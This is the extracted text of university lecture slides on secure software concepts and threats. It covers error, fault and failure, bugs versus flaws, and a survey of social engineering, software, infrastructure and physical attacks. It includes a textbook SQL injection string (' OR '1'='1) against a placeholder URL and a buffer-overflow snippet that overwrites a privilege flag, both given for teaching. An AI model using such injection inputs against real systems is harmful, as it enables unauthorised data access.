Lect1-Secure Software Concepts & Threats(1) (1).pdf

Full Transcript

CYS 407 : Secure Software Design and Engineering
Topic: Secure Software Concepts & Threats
Ref: Official (ISC)2 guide to CSSLP CBK (Domain 1)
1

Agenda
•
What is Software Security?
•
Software Error, Fault and Failure?
•
Software Flaw vs Software Bug?
•
Software security Challenges
•
Concept of Holistic Security
•
Software Development Life Cycle (SDLC)
•
SDLC Models
•
Risk Management
2

What is Software Security?

General Question

Why can websites, servers, browsers, laptops, smartphones, Wi-Fi access
points, network routers, mobile phones, cars, pacemakers, uranium enrichment
facilities, ... be hacked?

Correct Answer

Because They contain software
3

What is Software Security?

Software security —the idea of engineering software so that it continues
to function correctly under malicious attack

Software provides functionality
•
E.g., on-line exam results
•
This functionality comes with certain risks
•
E.g., what are risks of on-line exam results?
•
Privacy (score leakage); Modification
•
Software security is about managing these risksThe most important thing is to find out what is the most important thing.
—Shunryu Suzuki
4

What is Software Security?
•
Software Security heavily derives from:
•
Software Engineering: systematic application of engineering approaches to
the development of software
•
Programming Languages : Comprising of set of instructions used in
computer programming to implement algorithms
•
Security Engineering: concerned with building systems that remain secure
despite malice or error.
5


Security problems in software may be due to errors or mistakes at different stages of
software development life cycle, starting from requirement stage to design or implementation
stages. The following terminologies can be discussed in this context.

Software Error, Fault, Failure

Software Bug vs FlawSecurity problems in software
6

Software Error (mistake): A mistake in code is called Error

Common categories of Software Errors

functional

compilation

runtime

syntactical

logical errors

missing commands

communication problems

and so on.

The mistakes can make an app malfunction (fail to function normally) or crash and also make it
vulnerable to attacks.

Related to programmer or developer Software Error, Fault,
Failure
7

Software Error
Functionality Errors:
Functionality is a way the software is intended
to behave. Software has a functionality error if
something that you expect it to do is hard,
awkward, confusing, or impossible.
Expected Functionality for Cancel button is that the
‘Create new project’ window should close and none of the
changes should be saved (i.e. no new project must be
created). If the Cancel button is not clickable then it is a
functionality error.
8
https://www.softwaretestinghelp.com/types-of-software-errors/

Software Error
Missing Command Errors:
This happens to occur when an
expected command is missing . See
this screenshot:
This window allows the user to create a new project. However, there is
no option for the user to exit from this window without creating the
project. Since ‘Cancel’ option/button is not provided to the user, this is a
missing command error. What is missing?
9
https://www.softwaretestinghelp.com/types-of-software-errors/

Syntactic Error:
Syntactic errors are misspelled words or grammatically
incorrect sentences and are very evident while testing
software GUI.
Note the misspelled word ‘Cancel':
Note the grammatically incorrect
message:Software Error
Any error here?
Any error here?
10
https://www.softwaretestinghelp.com/types-of-software-errors/

Error handling errors:
Any errors that occur while the user is interacting
with the software needs to be handled in a clear
and meaningful manner. If not, it is called as an Error
Handling Error.
Take a look at this image. The error message gives no
indication of what the error is. Is it missing mandatory
field, saving error, page loading error or is it a system
error? Hence, this is an ‘Error Handing Error'.
https://www.softwaretestinghelp.com/types-of-software-errors/ What is wrong here?Software Error
11

Software Error, Fault, Failure
Error : human mistake - related to developers - could be logic or syntax errors
Fault: any deviation between actual and expected results - result of error - related to tester
Failure: occurs when fault executes
12Error
Fault
FailureLeads to
Leads to Fault Error
Fault Failure
Failure

Software Flaw vs Bug

Bug
A bug is the result of coding error, at Implementation level , relate to programmer- detecting
and fixing bugs relatively easy.

a software bug is an unintended mistake in a program that causes the program to break
in certain situations

Some bugs qualify as security bugs and might, for example, enable a malicious user to
bypass
access controls in order to obtain unauthorized privileges .
Flaw:
Flaws are the mistakes at Design level – difficult to detect
13

Software Flaw vs Bug
Who will
explain?
14Python:
Less than or equal to : <=
Greater than or equal: >= (FLAW)(Error)
(BUG)

15Software Development Security Problems
•
Problem areas in software development:
•
Buffer overflow
•
Command injection
•
Cross-site scripting
•
Failure to handle errors
•
Failure to protect network traffic
•
Failure to store and protect data securely
•
Improper file access

16Known Attacks on Software and Software Systems

Definitions
■ Vulnerability —is a weakness in a system or software that can be exploited
to make a system behave in an unintended way.
- Insufficient testing – no input validation

■ Threats — A threat is a person or event that has the potential for impacting
a valuable resource in a negative manner
- All kinds of social engineering attacks, ransomware, worms, and viruses
are considered as possible threats

■ Attacks — An intelligent act that is a deliberate attempt to evade security
services and violate the security policy of a system

Known Types of Attack??
Known Type of
Attacks
Social Engineering
Attacks Attacks against the
Application’s
Software Attacks against the
Supporting
Infrastructure Physical Attacks
Attackers gain sensitive information so that they can steal identities, customers or secrets, why?

To get financial gain, to put company business out, etc.

Attacker attempt all the way until a hole finally opens, Attacks come from different angles-

Social engineering

Application’s software

Supporting infrastructure

Physical attacks

Social Engineering Attacks
Social Engineering Attacks
Organization
Penetration
IT Infrastructure
Exploration
Phishing
Spam
Spoofing
Man in the Middle Social engineering , in the context of information security , refers to
psychological manipulation
of people into performing actions or exposing
confidential information - A type of confidence trick for the purpose of
information gathering, fraud, or system access [Wikipedia]
"I'm traveling in London and I've lost my
wallet. Can you wire some money?"

Social Engineering Attacks
Social Engineering Attacks
Organization
Penetration
IT Infrastructure
Exploration
Phishing
Spam
Spoofing
Man in the Middle A method of tricking people at work into giving access to
company resources
•
E.g. A person in disguise might visit a building as a
representative from a vendor wanting to check a system

Social Engineering Attacks
Social Engineering Attacks
Organization
Penetration
IT Infrastructure
Exploration
Phishing
Spam
Spoofing
Man in the Middle A method of obtaining information such as organizational
charts and phone numbers by cold-calling under disguise
The term IT infrastructure is defined as a
combined set of hardware, software, networks,
facilities, etc.

Social Engineering Attacks
Social Engineering Attacks
Organization
Penetration
IT Infrastructure
Exploration
Phishing
Spam
Spoofing
Man in the Middle Phishing is a type of social-engineering attack that
involves using e-mail or other types of messages in an
attempt to trick others into providing sensitive
information, such as credit card numbers or passwords.

Social Engineering Attacks
Social Engineering Attacks
Organization
Penetration
IT Infrastructure
Exploration
Phishing
Spam
Spoofing
Man in the Middle Sometimes when a user clicks a junk email to read, the
email attempts to phish the user to visiting another
website.Spamming is a method of flooding the Internet with copies
of the same message. Most spams are commercial
advertisements which are sent as an unwanted email to
users. Spams are also known as Electronic junk mails or
junk newsgroup postings. These spam mails are very
annoying as it keeps coming every day and keeps your
mailbox full.

Social Engineering Attacks
Social Engineering Attacks
Organization
Penetration
IT Infrastructure
Exploration
Phishing
Spam
Spoofing
Man in the Middle Spoofing : A technique that spammers and virus writers use
to change the “From” address in the messages they send.
Types of Spoofing:
IP Spoofing:
Email Spoofing
Web Spoofing IP Spoofing
Who will Explain?

Social Engineering Attacks
Social Engineering Attacks
Organization
Penetration
IT Infrastructure
Exploration
Phishing
Spam
Spoofing
Man in the Middle In a Man-in-the-Middle attack the attacker gets in the
middle of a real run of a protocol.
The possible uses of such attacks are
•
Theft of information
•
Hijacking of an ongoing session to gain access to private network
resources
•
Traffic analysis to derive information about a network and its users,

Attacks Against the Software Itself
Attacks Against the Software Itself
Cross-site scripting
(XSS)
Buffer Overflows
SQL Code Injection
Time/Logic Bomb
Back door 
No software will ever be 100% completely safe- not for
long anyhow

Old saying “ For every door shut, a new one opens ”

Same true for software, for every countermeasure
created, a new attack will be created to one-up the
previous

Attacks Against the Software Itself
Attacks Against the Software Itself
Cross-site scripting
(XSS)
Buffer Overflows
SQL Code Injection
Time/Logic Bomb
Back door XSS: Cross-Site Scripting
•
Quite common vulnerability in web applications
•
Allows attackers to insert Malicious Code
•
To bypass access
•
To launch “phishing” attacks
•
Cross-Site” -foreign script sent via server to client
•
Malicious script is executed in Client’s Web Browser XSS : Cross-Site Scripting

Attacks Against the Software Itself XSS : Cross-Site Scripting
Source: https://excess-xss.com/1. The attacker uses one of the website's
forms to insert a malicious string into
the website's database.
2. The victim requests a page from the
website.
3. The website includes the malicious
string from the database in the
response and sends it to the victim.
4. The victim's browser executes the
malicious script inside the response,
sending the victim's cookies to the
attacker's server.

Attacks Against the Software Itself XSS : Cross-Site Scripting

Cross-Site Request Forgery
(CSRF) is an attack that
forces an end user to
execute unwanted actions
on a web application in
which they’re currently
authenticated Is CSRF same as XSS?
NO

Attacks Against the Software Itself
Attacks Against the Software Itself
Cross-site scripting
(XSS)
Buffer Overflows
SQL Code Injection
Time/Logic Bomb
Back door Buffer Overflows
A stack overflow exploit occurs when a user enters data
that exceeds the memory reserved for the input. The input
can change adjacent data or the return address on the
stack. Buffer Overflows
The Problem

Attacks Against the Software Itself
Attacks Against the Software Itself
Cross-site scripting
(XSS)
Buffer Overflows
SQL Code Injection
Time/Logic Bomb
Back door S m i t h false
char name[8]
•
When the program reads the name “Armstrong”
A r m s t r o n g
char name[8] rootPriv
rootPrivBuffer Overflows-Example
boolean rootPriv = false;
char name[8];
cin >> name;
•
When the program reads the name “Smith”

Attacks Against the Software Itself
Attacks Against the Software Itself
Cross-site scripting
(XSS)
Buffer Overflows
SQL Code Injection
Time/Logic Bomb
Back door SQL Code Injection
•
Values received from a Web form, cookie, input parameter,
etc., are not typically validated before passing them to SQL
queries to a database server.
•
An attacker can control the input that is sent to an SQL
query and manipulate that input
•
The attacker may be able to execute the code on the back-
end database. SQL Code Injection

Attacks Against the Software Itself
Attacks Against the Software Itself
Cross-site scripting
(XSS)
Buffer Overflows
SQL Code Injection
Time/Logic Bomb
Back door SQL Code Injection
Simple Three-Tier Architecture-database driven web application
HTML
PHP Script
Database

Attacks Against the Software Itself
Attacks Against the Software Itself
Cross-site scripting
(XSS)
Buffer Overflows
SQL Code Injection
Time/Logic Bomb
Back door SQL Code Injection
•
http://www.victim.com/products.php? val=100
•
To view products less than $100
•
val is used to pass the value you want to check for
•
PHP Scripts create a SQL statement based on this
SELECT *
FROM Products
WHERE Price < ‘ 100.00 ’
ORDER BY ProductDescription; Reference: SQL Injection Attacks and Defense
By Justin Clarke

Attacks Against the Software Itself
Attacks Against the Software Itself
Cross-site scripting
(XSS)
Buffer Overflows
SQL Code Injection
Time/Logic Bomb
Back door SQL Code Injection
35•
http://www.victim.com/products.php?val=100 ’ OR ‘1’=‘1
SELECT *
FROM Products
WHERE Price < ‘ 100.00’ OR ‘1’=‘1 ’
ORDER BY ProductDescription;
The WHERE condition is always true
So returns all the product !
Practice from here:
https://www.w3schools.com/sql/sql_orderby.asp

Attacks Against the Software Itself
Attacks Against the Software Itself
Cross-site scripting
(XSS)
Buffer Overflows
SQL Code Injection
Time/Logic Bomb
Back door Logic Bomb vs Time Bomb
Logic Bomb
A malicious code inserted into an application or operating system
that causes it to perform some destructive or security
compromising activity whenever specified conditions are met
E.g. specific date and time, deletion of certain name from
database, access to certain website. Or Visit a specific page
Time Bomb
A time bomb is considered to be sub form of logic bomb that is
triggered by reaching some preset time, either once or periodically

Attacks Against the Software Itself
Attacks Against the Software Itself
Cross-site scripting
(XSS)
Buffer Overflows
SQL Code Injection
Time/Logic Bomb
Back door Back door
Back door
A backdoor is an undocumented method of gaining access to
program or a computer by using another installed program or
rootkit that bypasses normal authentication. The backdoor is
generally written by the programmer who created the original
program and is often only known to that person. E.g.

A developer may create a backdoor so that an application or
operating system can be accessed for troubleshooting or other
purposes

Attackers often use backdoors that they detect or install
themselves as part of an exploit

Attacks Against the Infrastructure
Attacks Against the
Infrastructure
Denial of Service
(DoS)
Virus
Worm
Trojans
Spayware
Adware Denial of Service (DoS)
1. Denial of service implies that an attacker disables or corrupts networks,
systems, or services with the intent to deny services to intended users
2. DoS attacks involve either crashing the system or slowing it down to the
point that it is unusable
3. DoS can also be as simple as deleting or corrupting information
4. In most cases, performing the attack simply involves running a hack or
script
5. The attacker does not need prior access to the target

Attacks Against the Infrastructure
Attacks Against the
Infrastructure
Denial of Service
(DoS)
Virus
Worm
Trojans
Spyware
Adware 
The virus is the program code that attaches itself to application
program and when application program run it runs along with it

It has to rely on users transferring infected files/programs to other
computer systems

Yes, it deletes or modifies files. Sometimes a virus also changes
the location of files

The worm is code that replicate itself in order to consume
resources to bring it down

It can use a network to replicate itself to other computer systems
without user intervention

Usually not. Worms usually only monopolize the CPU and memoryVirus http://www.symantec.com/connect/articles/what-
are-malware-viruses-spyware-and-cookies-and-
what-differentiates-them
Worms Virus vs Worms

Attacks Against the Infrastructure
Trojans
•
A Trojan horse, or Trojan, is a type of malicious code or software that
looks legitimate but can take control of your computer.
•
A Trojan can act as,
•
Keylogger – steals passwords, credit card #, bank details
•
Spam server – forces victim PC to send spam
•
DDOS – becomes ‘zombie computer’ participating in Distributed
Denial of Service attack

A user has to execute TrojansAttacks Against the
Infrastructure
Denial of Service
(DoS)
Virus
Worm
Trojans
Spyware
Adware

Attacks Against the Infrastructure
Attacks Against the
Infrastructure
Denial of Service
(DoS)
Virus
Worm
Trojans
Spyware
Adware Adware:

A dware is a software application in which advertising
banners are displayed while any program is running.

Adwares are used by companies for marketing purpose
Spywares:

Spyware is a type of program that is installed with or without
your permission on your personal computers

Spywares are used to collect information about users, their
computer or browsing habits tracks each and everything that
you do without your knowledge and send it to remote user. Adware vs Spyware

Physical Attacks
Physical Attacks
Cutting Critical Lines
Stealing Hardware (PCs, Disks)
Stealing Information (Data, Documentations)
Stealing Resources for personal gain •
Physical attacks can equally upset an organization like
software attacks
•
Theft of mobile devices, code and information cost a
company a big loss
•
Flash drives and/or external/portable hard disks are
convenient way to copy information and walkout without
devising any special plan
•
Following are types of physical attacks
•
Cutting critical lines
•
Stealing hardware
•
Stealing information and documentation
•
Stealing resources for personal gain

Any Questions?
43